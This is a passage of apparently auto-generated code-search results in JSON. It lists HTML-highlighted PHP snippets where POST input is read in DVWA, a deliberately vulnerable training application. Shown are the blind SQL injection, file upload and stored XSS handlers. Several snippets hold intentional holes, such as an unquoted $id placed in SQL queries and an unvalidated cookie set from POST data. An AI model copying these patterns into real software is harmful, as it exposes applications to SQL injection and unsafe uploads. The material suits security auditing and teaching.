"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$id</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token variable\">$id</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 205,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">6:</span> <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'authenticated'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Blind SQL Injection Cookie Input'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token function\">setcookie</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'id'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Cookie ID set!<br /><br /><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"<span class=\"token operator\"><</span>script<span class=\"token operator\">></span>window<span class=\"token punctuation\">.</span>opener<span class=\"token punctuation\">.</span>location<span class=\"token punctuation\">.</span><span class=\"token function\">reload</span><span class=\"token punctuation\">(</span><span class=\"token boolean\">true</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</script>\";</span>\n<span class=\"line-number\">15:</span> }\n<span class=\"line-number\">16:</span> ",
"line": 11,
"start": 6,
"end": 17,
"severity": "unknown",
"note": ""
},
{
"id": 206,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Blind SQL Injection Cookie Input'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token function\">setcookie</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'id'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Cookie ID set!<br /><br /><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"<span class=\"token operator\"><</span>script<span class=\"token operator\">></span>window<span class=\"token punctuation\">.</span>opener<span class=\"token punctuation\">.</span>location<span class=\"token punctuation\">.</span><span class=\"token function\">reload</span><span class=\"token punctuation\">(</span><span class=\"token boolean\">true</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</script>\";</span>\n<span class=\"line-number\">15:</span> }\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 225,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$id</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 226,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$id</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$getid</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token variable\">$id</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$getid</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; // Removed 'or die' to suppress mysql errors</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 256,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/high.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 261,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 268,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/low.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Can we move the file <span class=\"token keyword\">to</span> the upload folder<span class=\"token operator\">?</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 274,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 294,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/high.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 295,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/high.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">strip_tags</span><span class=\"token punctuation\">(</span> <span class=\"token function\">addslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token 